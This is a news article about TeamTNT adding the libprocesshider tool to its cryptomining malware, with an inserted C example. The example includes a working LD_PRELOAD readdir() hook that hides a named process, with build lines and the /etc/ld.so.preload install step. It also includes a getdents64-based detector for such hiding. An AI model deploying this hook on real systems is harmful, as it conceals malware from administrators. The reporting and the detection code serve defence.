The detection-evasion tool, libprocesshider, hides TeamTNT’s malware from process-information programs.
The TeamTNT threat group has added a new detection-evasion tool to its arsenal, helping its cryptomining malware slip past defense teams.
The TeamTNT cybercrime group is known for cloud-based attacks, including targeting Amazon Web Services (AWS) credentials in order to break into cloud accounts and use them to mine the Monero cryptocurrency. It has also previously targeted Docker and Kubernetes cloud instances.
The new detection-evasion tool, libprocesshider, is copied from open-source repositories. The open-source tool, dating from 2014, has been found on GitHub, and is described as having the ability to “hide a process under Linux using the ld preloader.”
“While the new functionality of libprocesshider is to evade detection and other basic functions, it acts as an indicator to consider when looking for malicious activity on the host level,” said researchers with AT&T’s Alien Labs, on Wednesday.
The new tool is delivered within a base64-encoded script, hidden in the TeamTNT cryptominer binary, or through its Internet Relay Chat (IRC) bot, known as TNTbotinger, which is capable of distributed denial of service (DDoS) attacks.
In the attack chain, after the base64-encoded script is downloaded, it runs through multiple tasks. These include modifying the network DNS configuration, setting up persistence (via systemd), downloading the latest IRC bot configuration, clearing evidence of its activity, and dropping and activating libprocesshider. The tool is dropped on disk as a hidden Tape Archive file (the tar format, commonly used for open-source software distribution), then unpacked by the script and written to ‘/usr/local/lib/systemhealt.so’.
libprocesshider then hides the malicious process from process-information programs such as ‘ps’ and ‘lsof’.
These are both process-viewer tools. The ‘ps’ program (short for “process status”) displays the currently running processes on Unix-like operating systems; ‘lsof’ (short for “list open files”) is a command, also used on Unix-like operating systems, that, as the name suggests, reports a list of all open files and the processes that opened them. Hiding the process from these two process-viewer tools lets the attacker cloak its malicious activity.
libprocesshider uses a technique known as preloading in order to hide its activity from ‘ps’ and ‘lsof.’ This technique makes the dynamic linker load a custom shared library (named in the LD_PRELOAD environment variable or in the /etc/ld.so.preload file) before the system libraries are loaded.
“If the custom shared library exports a function with the same signature as one found in the system libraries, the custom version will override it,” said researchers.
The preloaded custom shared library exports its own implementation of readdir(), the function that programs such as ‘ps’ use to read the /proc directory and find running processes. The hooked readdir() calls the real one and drops any entry that belongs to the malicious process, so ‘ps’ and ‘lsof’ never see it.
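The two halves of that mechanism, as an added example in C that is not the page's or libprocesshider's own code: the per-entry decision a readdir() hook makes and the preload wrapper around it (keyed here on /proc/&lt;pid&gt;/comm and an assumed target name "xmrig"; libprocesshider itself matches on /proc/&lt;pid&gt;/stat, and also hooks readdir64 the same way), plus the check a defender wants: enumerate /proc with the raw getdents64 syscall, which a userland hook cannot intercept, and diff that against what libc's readdir() reports. make_sample_proc() builds a constructed miniature /proc under /tmp so the functions run offline; the hook body is compiled only with -DBUILD_AS_PRELOAD.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE          /* RTLD_NEXT for the preload build */
#endif
#include <dirent.h>
#include <dlfcn.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <unistd.h>

#define MAX_PIDS 65536
#define HIDDEN_COMM "xmrig"  /* assumed process name, for illustration only */

/* All digits: a /proc/<pid> entry rather than "self", "sys", "net", ... */
static int is_pid_name(const char *name)
{
    if (*name == '\0') return 0;
    for (; *name; name++)
        if (*name < '0' || *name > '9') return 0;
    return 1;
}

/* Read <procroot>/<pid>/comm (the kernel's short process name). 1 on success. */
static int read_comm(const char *procroot, const char *pid, char *buf, size_t len)
{
    char path[PATH_MAX];
    snprintf(path, sizeof path, "%s/%s/comm", procroot, pid);
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    int ok = fgets(buf, (int)len, f) != NULL;
    fclose(f);
    if (ok) buf[strcspn(buf, "\n")] = '\0';
    return ok;
}

/* The decision the hook makes per directory entry: suppress the entry if it is
 * a PID whose process name matches the target. Anything else passes through. */
int should_hide(const char *procroot, const char *entry, const char *target)
{
    char comm[64];
    if (!is_pid_name(entry)) return 0;
    if (!read_comm(procroot, entry, comm, sizeof comm)) return 0;
    return strcmp(comm, target) == 0;
}

#ifdef BUILD_AS_PRELOAD
/* Build: gcc -DBUILD_AS_PRELOAD -shared -fPIC -o hider.so hider.c -ldl
 * Use:   LD_PRELOAD=./hider.so ps aux             (one process)
 *        echo /path/hider.so >> /etc/ld.so.preload (system-wide, what a dropper does)
 * Loaded before libc, this readdir symbol wins; the real one comes via RTLD_NEXT. */
struct dirent *readdir(DIR *dirp)
{
    static struct dirent *(*real_readdir)(DIR *) = NULL;
    if (!real_readdir)
        real_readdir = (struct dirent *(*)(DIR *))dlsym(RTLD_NEXT, "readdir");
    /* Only filter when the DIR really is /proc: resolve its fd to a path. */
    char link[64], dir[PATH_MAX];
    snprintf(link, sizeof link, "/proc/self/fd/%d", dirfd(dirp));
    ssize_t n = readlink(link, dir, sizeof dir - 1);
    dir[n > 0 ? n : 0] = '\0';
    int in_proc = strcmp(dir, "/proc") == 0;
    struct dirent *de;
    while ((de = real_readdir(dirp)) != NULL)
        if (!in_proc || !should_hide("/proc", de->d_name, HIDDEN_COMM))
            break;
    return de;
}
#endif

/* Enumerate PIDs through libc's readdir(): the path a preloaded hook intercepts. */
int list_pids_libc(const char *procroot, int *pids, int max)
{
    DIR *d = opendir(procroot);
    if (!d) return -1;
    int n = 0;
    struct dirent *de;
    while ((de = readdir(d)) != NULL && n < max)
        if (is_pid_name(de->d_name)) pids[n++] = atoi(de->d_name);
    closedir(d);
    return n;
}

struct linux_dirent64 {  /* kernel record layout returned by getdents64 */
    unsigned long long d_ino;
    long long          d_off;
    unsigned short     d_reclen;
    unsigned char      d_type;
    char               d_name[];
};

/* Enumerate PIDs with the raw getdents64 syscall. A userland readdir() hook never
 * sees these results, so a PID present here but missing from the libc listing is
 * being hidden in user space (a kernel rootkit would need a different check). */
int list_pids_syscall(const char *procroot, int *pids, int max)
{
    int fd = open(procroot, O_RDONLY | O_DIRECTORY);
    if (fd < 0) return -1;
    static char buf[32768];
    int n = 0;
    for (;;) {
        long nread = syscall(SYS_getdents64, fd, buf, sizeof buf);
        if (nread <= 0) break;
        for (long off = 0; off < nread && n < max;) {
            struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + off);
            if (is_pid_name(d->d_name)) pids[n++] = atoi(d->d_name);
            off += d->d_reclen;
        }
    }
    close(fd);
    return n;
}

static int contains(const int *a, int n, int v)
{
    for (int i = 0; i < n; i++) if (a[i] == v) return 1;
    return 0;
}

/* PIDs the kernel reports but libc's readdir() does not. The syscall listing is
 * taken first and each candidate re-checked with access(), so a process that
 * exits between the two listings is not reported as hidden. */
int count_hidden(const char *procroot)
{
    static int via_sys[MAX_PIDS], via_libc[MAX_PIDS];
    int ns = list_pids_syscall(procroot, via_sys, MAX_PIDS);
    int nl = list_pids_libc(procroot, via_libc, MAX_PIDS);
    if (ns < 0 || nl < 0) return -1;
    int hidden = 0;
    char path[PATH_MAX];
    for (int i = 0; i < ns; i++) {
        if (contains(via_libc, nl, via_sys[i])) continue;
        snprintf(path, sizeof path, "%s/%d", procroot, via_sys[i]);
        if (access(path, F_OK) != 0) continue;   /* it just exited, not hidden */
        printf("hidden pid %d\n", via_sys[i]);
        hidden++;
    }
    return hidden;
}

/* Constructed sample data: a miniature /proc with two PIDs and a "self" entry. */
const char *make_sample_proc(void)
{
    static char root[] = "/tmp/fakeproc.XXXXXX";
    static int built = 0;
    if (built) return root;
    if (!mkdtemp(root)) return NULL;
    const char *pids[] = {"41", "42"}, *comms[] = {"xmrig", "bash"};
    char path[PATH_MAX];
    for (int i = 0; i < 2; i++) {
        snprintf(path, sizeof path, "%s/%s", root, pids[i]);
        mkdir(path, 0755);
        snprintf(path, sizeof path, "%s/%s/comm", root, pids[i]);
        FILE *f = fopen(path, "w");
        if (f) { fprintf(f, "%s\n", comms[i]); fclose(f); }
    }
    snprintf(path, sizeof path, "%s/self", root);
    mkdir(path, 0755);
    built = 1;
    return root;
}

int main(void)
{
    /* The system-wide preload list is a cheap indicator on a server that has no
     * legitimate reason to carry one. */
    if (access("/etc/ld.so.preload", F_OK) == 0)
        printf("warning: /etc/ld.so.preload exists, inspect it\n");
    int h = count_hidden("/proc");
    printf("%d process(es) hidden from readdir()\n", h);
    return h > 0 ? 1 : 0;
}
```

On a clean host count_hidden("/proc") returns 0; with the preload build active for a process named xmrig it reports that PID, because the getdents64 path bypasses the hooked readdir(). The comparison only catches user-space hiding: a kernel-level rootkit filters the syscall result itself, and a different check (for example walking /proc/<pid> for every PID up to /proc/sys/kernel/pid_max) is needed there.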
TeamTNT Continues to Add New Features
TeamTNT has repeatedly been observed deploying updates to its cryptomining malware, including a new memory loader discovered just a few weeks ago, which was based on Ezuri and written in Golang.
In August, TeamTNT’s cryptomining worm was discovered spreading through the AWS cloud and harvesting credentials. Then, after a hiatus, the TeamTNT group returned in September to attack Docker and Kubernetes cloud instances by abusing a legitimate cloud-monitoring tool known as Weave Scope.
Parts of this article are sourced from:
threatpost.com